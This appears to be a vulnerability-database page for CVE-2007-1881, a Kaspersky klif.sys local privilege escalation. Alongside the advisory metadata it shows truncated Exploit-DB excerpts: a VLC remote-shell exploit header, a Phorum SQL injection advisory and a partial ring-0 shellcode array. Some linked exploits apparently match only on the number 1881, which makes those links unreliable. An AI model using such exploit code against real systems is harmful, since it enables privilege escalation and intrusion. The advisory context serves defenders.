CVE-2007-1881
published 2007-04-06CVE-2007-1881: Unspecified vulnerability in KLIF (klif.sys) in Kaspersky Anti-Virus, Anti-Virus for Workstations, and Anti-Virus for File Servers 6.0, and Internet Security…
PriorityP420medium6.8CVSS 2.0
AVLACLAuSCCICAC
EXPLOIT
EPSS
0.67%
47.3th percentile
Unspecified vulnerability in KLIF (klif.sys) in Kaspersky Anti-Virus, Anti-Virus for Workstations, and Anti-Virus for File Servers 6.0, and Internet Security 6.0 before Maintenance Pack 2 build 6.0.2.614 allows local users to gain Ring-0 privileges via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kaspersky_lab | kaspersky_anti-virus | <= 6.0 | — |
| kaspersky_lab | kaspersky_anti-virus | — | — |
| kaspersky_lab | kaspersky_internet_security | <= 6.0.1.411 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection
exploitdb·2007-04-23
CVE-2007-2339 Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection
Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection
---
source: https://www.securityfocus.com/bid/23616/info
Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation.
Phorum 5.1.20 is affected; prior versions may also be vulnerable.
Let's look at source code of "include/db/mysq.php" ~ line 1881 :
------------------[source code]--------------
Exploit-DB
Kaspersky AntiVirus 6.0 - Local Privilege Escalation
exploitdb·2007-01-15
CVE-2007-1881 Kaspersky AntiVirus 6.0 - Local Privilege Escalation
Kaspersky AntiVirus 6.0 - Local Privilege Escalation
---
// kav 6.0 0day local priv escalation exploit
// by m4d
// http://unl0ck.net
#include
#include
#include
// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"
unsigned char Shellcode[405] = {
0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B,
0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66,
0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF,
0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00,
0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D,
0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0
No writeups or analysis indexed.
http://secunia.com/advisories/24778http://www.kaspersky.com/technews?id=203038693http://www.kaspersky.com/technews?id=203038694http://www.osvdb.org/33852http://www.vupen.com/english/advisories/2007/1268http://secunia.com/advisories/24778http://www.kaspersky.com/technews?id=203038693http://www.kaspersky.com/technews?id=203038694http://www.osvdb.org/33852http://www.vupen.com/english/advisories/2007/1268
2007-04-06
Published